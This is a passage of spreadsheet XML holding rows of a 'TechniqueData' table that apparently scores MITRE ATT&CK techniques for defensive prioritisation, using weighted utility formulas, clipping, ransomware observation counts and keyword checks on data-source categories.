        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K22" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L22" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M22" s="37">
        <v>0</v>
      </c>
      <c r="N22" s="56">
        <v>0</v>
      </c>
      <c r="O22" s="56">
        <v>0</v>
      </c>
      <c r="P22" s="56">
        <v>0</v>
      </c>
      <c r="Q22" s="56">
        <v>0</v>
      </c>
      <c r="R22" s="57" t="s">
        <v>141</v>
      </c>
      <c r="S22" s="57">
        <v>3</v>
      </c>
      <c r="T22" s="57" t="s">
        <v>142</v>
      </c>
      <c r="U22" s="57">
        <v>4</v>
      </c>
      <c r="V22" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>6.6666809523809531E-2</v>
      </c>
      <c r="W22" s="37">
        <v>7</v>
      </c>
      <c r="X22" s="37">
        <v>0.127273</v>
      </c>
      <c r="Y22" s="37">
        <v>0.127273</v>
      </c>
      <c r="Z22" s="37">
        <v>0</v>
      </c>
      <c r="AA22" s="37">
        <v>0</v>
      </c>
      <c r="AB22" s="37">
        <v>0</v>
      </c>
      <c r="AC22" s="37"/>
      <c r="AD22" s="50" t="s">
        <v>143</v>
      </c>
      <c r="AE22" s="37" t="str" cm="1">
        <f t="array" ref="AE22">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD22)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF22" s="37">
        <v>18</v>
      </c>
      <c r="AG22" s="37" t="str" cm="1">
        <f t="array" ref="AG22">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD22)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH22" s="37">
        <v>18</v>
      </c>
      <c r="AI22" s="37" t="str" cm="1">
        <f t="array" ref="AI22">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD22)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ22" s="37">
        <v>18</v>
      </c>
      <c r="AK22" s="37" t="str" cm="1">
        <f t="array" ref="AK22">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD22)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL22" s="37">
        <v>18</v>
      </c>
      <c r="AM22" s="37" t="str" cm="1">
        <f t="array" ref="AM22">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD22)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN22" s="37">
        <v>0</v>
      </c>
      <c r="AO22" s="37">
        <v>4</v>
      </c>
      <c r="AP22" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.43333333333333335</v>
      </c>
      <c r="AQ22" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.0555590317460313</v>
      </c>
      <c r="AR22" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS22" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AT22" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AU2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0.48148181254724104</v>
      </c>
    </row>
    <row r="23" spans="1:47" ht="68">
      <c r="A23" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B23" s="37">
        <f t="shared" si="0"/>
        <v>17.966648333333335</v>
      </c>
      <c r="C23" s="37" t="s">
        <v>144</v>
      </c>
      <c r="D23" s="50" t="s">
        <v>140</v>
      </c>
      <c r="E23" s="37" t="s">
        <v>145</v>
      </c>
      <c r="F23" s="37">
        <v>1</v>
      </c>
      <c r="G23" s="37">
        <v>1</v>
      </c>
      <c r="H23" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I23" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J23" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K23" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L23" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M23" s="37">
        <v>0</v>
      </c>
      <c r="N23" s="56">
        <v>0</v>
      </c>
      <c r="O23" s="56">
        <v>0</v>
      </c>
      <c r="P23" s="56">
        <v>0</v>
      </c>
      <c r="Q23" s="56">
        <v>0</v>
      </c>
      <c r="R23" s="57" t="s">
        <v>146</v>
      </c>
      <c r="S23" s="57">
        <v>6</v>
      </c>
      <c r="T23" s="57" t="s">
        <v>147</v>
      </c>
      <c r="U23" s="57">
        <v>8</v>
      </c>
      <c r="V23" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.13333309523809525</v>
      </c>
      <c r="W23" s="37">
        <v>14</v>
      </c>
      <c r="X23" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Y23" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Z23" s="37">
        <v>0</v>
      </c>
      <c r="AA23" s="37">
        <v>0</v>
      </c>
      <c r="AB23" s="37">
        <v>0</v>
      </c>
      <c r="AC23" s="37"/>
      <c r="AD23" s="50" t="s">
        <v>143</v>
      </c>
      <c r="AE23" s="37" t="str" cm="1">
        <f t="array" ref="AE23">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD23)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF23" s="37">
        <v>19</v>
      </c>
      <c r="AG23" s="37" t="str" cm="1">
        <f t="array" ref="AG23">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD23)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH23" s="37">
        <v>19</v>
      </c>
      <c r="AI23" s="37" t="str" cm="1">
        <f t="array" ref="AI23">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD23)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ23" s="37">
        <v>19</v>
      </c>
      <c r="AK23" s="37" t="str" cm="1">
        <f t="array" ref="AK23">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD23)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL23" s="37">
        <v>19</v>
      </c>
      <c r="AM23" s="37" t="str" cm="1">
        <f t="array" ref="AM23">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD23)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN23" s="37">
        <v>0</v>
      </c>
      <c r="AO23" s="37">
        <v>0</v>
      </c>
      <c r="AP23" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ23" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>5.9888827777777784</v>
      </c>
      <c r="AR23" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS23" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT23" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU2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4" spans="1:47" ht="51">
      <c r="A24" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B24" s="37">
        <f t="shared" si="0"/>
        <v>44.976746571428571</v>
      </c>
      <c r="C24" s="37" t="s">
        <v>148</v>
      </c>
      <c r="D24" s="50" t="s">
        <v>149</v>
      </c>
      <c r="E24" s="37"/>
      <c r="F24" s="37">
        <v>2</v>
      </c>
      <c r="G24" s="37">
        <v>5</v>
      </c>
      <c r="H24" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.35</v>
      </c>
      <c r="I24" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J24" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K24" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.5</v>
      </c>
      <c r="L24" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.5</v>
      </c>
      <c r="M24" s="37">
        <v>0.129078</v>
      </c>
      <c r="N24" s="56">
        <v>3</v>
      </c>
      <c r="O24" s="56">
        <v>10</v>
      </c>
      <c r="P24" s="56">
        <v>1</v>
      </c>
      <c r="Q24" s="56">
        <v>2</v>
      </c>
      <c r="R24" s="57"/>
      <c r="S24" s="57">
        <v>0</v>
      </c>
      <c r="T24" s="57"/>
      <c r="U24" s="57">
        <v>0</v>
      </c>
      <c r="V24" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>7.6190476190476183E-2</v>
      </c>
      <c r="W24" s="37">
        <v>0</v>
      </c>
      <c r="X24" s="37">
        <v>0</v>
      </c>
      <c r="Y24" s="37">
        <v>0</v>
      </c>
      <c r="Z24" s="37">
        <v>16</v>
      </c>
      <c r="AA24" s="37">
        <v>0.16</v>
      </c>
      <c r="AB24" s="37">
        <v>0.16</v>
      </c>
      <c r="AC24" s="37"/>
      <c r="AD24" s="50" t="s">
        <v>150</v>
      </c>
      <c r="AE24" s="37" t="str" cm="1">
        <f t="array" ref="AE24">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD24)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF24" s="37">
        <v>20</v>
      </c>
      <c r="AG24" s="37" t="str" cm="1">
        <f t="array" ref="AG24">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD24)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH24" s="37">
        <v>20</v>
      </c>
      <c r="AI24" s="37" t="str" cm="1">
        <f t="array" ref="AI24">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD24)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ24" s="37">
        <v>20</v>
      </c>
      <c r="AK24" s="37" t="str" cm="1">
        <f t="array" ref="AK24">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD24)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL24" s="37">
        <v>20</v>
      </c>
      <c r="AM24" s="37" t="str" cm="1">
        <f t="array" ref="AM24">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD24)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN24" s="37">
        <v>0</v>
      </c>
      <c r="AO24" s="37">
        <v>2</v>
      </c>
      <c r="AP24" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ24" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>14.992248857142856</v>
      </c>
      <c r="AR24" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS24" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT24" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU2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0.76153565986394556</v>
      </c>
    </row>
    <row r="25" spans="1:47" ht="34">
      <c r="A25" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B25" s="37">
        <f t="shared" si="0"/>
        <v>10.19333761904762</v>
      </c>
      <c r="C25" s="37" t="s">
        <v>151</v>
      </c>
      <c r="D25" s="50" t="s">
        <v>152</v>
      </c>
      <c r="E25" s="37"/>
      <c r="F25" s="37">
        <v>1</v>
      </c>
      <c r="G25" s="37">
        <v>1</v>
      </c>
      <c r="H25" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I25" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J25" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K25" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L25" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M25" s="37">
        <v>8.7399999999999999E-4</v>
      </c>
      <c r="N25" s="56">
        <v>0</v>
      </c>
      <c r="O25" s="56">
        <v>1</v>
      </c>
      <c r="P25" s="56">
        <v>0</v>
      </c>
      <c r="Q25" s="56">
        <v>3</v>
      </c>
      <c r="R25" s="57"/>
      <c r="S25" s="57">
        <v>0</v>
      </c>
      <c r="T25" s="57"/>
      <c r="U25" s="57">
        <v>0</v>
      </c>
      <c r="V25" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>1.9047619047619046E-2</v>
      </c>
      <c r="W25" s="37">
        <v>0</v>
      </c>
      <c r="X25" s="37">
        <v>0</v>
      </c>
      <c r="Y25" s="37">
        <v>0</v>
      </c>
      <c r="Z25" s="37">
        <v>4</v>
      </c>
      <c r="AA25" s="37">
        <v>0.04</v>
      </c>
      <c r="AB25" s="37">
        <v>0.04</v>
      </c>
      <c r="AC25" s="37"/>
      <c r="AD25" s="50" t="s">
        <v>153</v>
      </c>
      <c r="AE25" s="37" t="str" cm="1">
        <f t="array" ref="AE25">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD25)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF25" s="37">
        <v>21</v>
      </c>
      <c r="AG25" s="37" t="str" cm="1">
        <f t="array" ref="AG25">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD25)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH25" s="37">
        <v>21</v>
      </c>
      <c r="AI25" s="37" t="str" cm="1">
        <f t="array" ref="AI25">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD25)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ25" s="37">
        <v>21</v>
      </c>
      <c r="AK25" s="37" t="str" cm="1">
        <f t="array" ref="AK25">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD25)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL25" s="37">
        <v>21</v>
      </c>
      <c r="AM25" s="37" t="str" cm="1">
        <f t="array" ref="AM25">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD25)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN25" s="37">
        <v>0</v>
      </c>
      <c r="AO25" s="37">
        <v>0</v>
      </c>
      <c r="AP25" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ25" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.3977792063492065</v>
      </c>
      <c r="AR25" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS25" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT25" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU2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6" spans="1:47" ht="51">
      <c r="A26" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.43333333333333335</v>
      </c>
      <c r="B26" s="37">
        <f t="shared" si="0"/>
        <v>18.286596904761904</v>
      </c>
      <c r="C26" s="37" t="s">
        <v>154</v>
      </c>
      <c r="D26" s="50" t="s">
        <v>155</v>
      </c>
      <c r="E26" s="37"/>
      <c r="F26" s="37">
        <v>1</v>
      </c>
      <c r="G26" s="37">
        <v>1</v>
      </c>
      <c r="H26" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I26" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J26" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K26" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L26" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M26" s="37">
        <v>2.4514999999999999E-2</v>
      </c>
      <c r="N26" s="56">
        <v>2</v>
      </c>
      <c r="O26" s="56">
        <v>8</v>
      </c>
      <c r="P26" s="56">
        <v>3</v>
      </c>
      <c r="Q26" s="56">
        <v>4</v>
      </c>
      <c r="R26" s="57"/>
      <c r="S26" s="57">
        <v>0</v>
      </c>
      <c r="T26" s="57"/>
      <c r="U26" s="57">
        <v>0</v>
      </c>
      <c r="V26" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>8.0952380952380956E-2</v>
      </c>
      <c r="W26" s="37">
        <v>0</v>
      </c>
      <c r="X26" s="37">
        <v>0</v>
      </c>
      <c r="Y26" s="37">
        <v>0</v>
      </c>
      <c r="Z26" s="37">
        <v>17</v>
      </c>
      <c r="AA26" s="37">
        <v>0.17</v>
      </c>
      <c r="AB26" s="37">
        <v>0.17</v>
      </c>
      <c r="AC26" s="37"/>
      <c r="AD26" s="50" t="s">
        <v>156</v>
      </c>
      <c r="AE26" s="37" t="str" cm="1">
        <f t="array" ref="AE26">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD26)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF26" s="37">
        <v>22</v>
      </c>
      <c r="AG26" s="37" t="str" cm="1">
        <f t="array" ref="AG26">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD26)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH26" s="37">
        <v>22</v>
      </c>
      <c r="AI26" s="37" t="str" cm="1">
        <f t="array" ref="AI26">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD26)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ26" s="37">
        <v>22</v>
      </c>
      <c r="AK26" s="37" t="str" cm="1">
        <f t="array" ref="AK26">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD26)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL26" s="37">
        <v>22</v>
      </c>
      <c r="AM26" s="37" t="str" cm="1">
        <f t="array" ref="AM26">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD26)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN26" s="37">
        <v>0</v>
      </c>
      <c r="AO26" s="37">
        <v>4</v>
      </c>
      <c r="AP26" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.43333333333333335</v>
      </c>
      <c r="AQ26" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>6.0955323015873013</v>
      </c>
      <c r="AR26" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS26" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AT26" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AU2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0.67576498110355243</v>
      </c>
    </row>
    <row r="27" spans="1:47" ht="34">
      <c r="A27" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B27" s="37">
        <f t="shared" si="0"/>
        <v>9.7428571428571438</v>
      </c>
      <c r="C27" s="37" t="s">
        <v>157</v>
      </c>
      <c r="D27" s="50" t="s">
        <v>155</v>
      </c>
      <c r="E27" s="37" t="s">
        <v>158</v>
      </c>
      <c r="F27" s="37">
        <v>1</v>
      </c>
      <c r="G27" s="37">
        <v>1</v>
      </c>
      <c r="H27" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I27" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J27" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K27" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L27" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M27" s="37">
        <v>0</v>
      </c>
      <c r="N27" s="56">
        <v>0</v>
      </c>
      <c r="O27" s="56">
        <v>0</v>
      </c>
      <c r="P27" s="56">
        <v>0</v>
      </c>
      <c r="Q27" s="56">
        <v>1</v>
      </c>
      <c r="R27" s="57"/>
      <c r="S27" s="57">
        <v>0</v>
      </c>
      <c r="T27" s="57"/>
      <c r="U27" s="57">
        <v>0</v>
      </c>
      <c r="V27" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047615E-3</v>
      </c>
      <c r="W27" s="37">
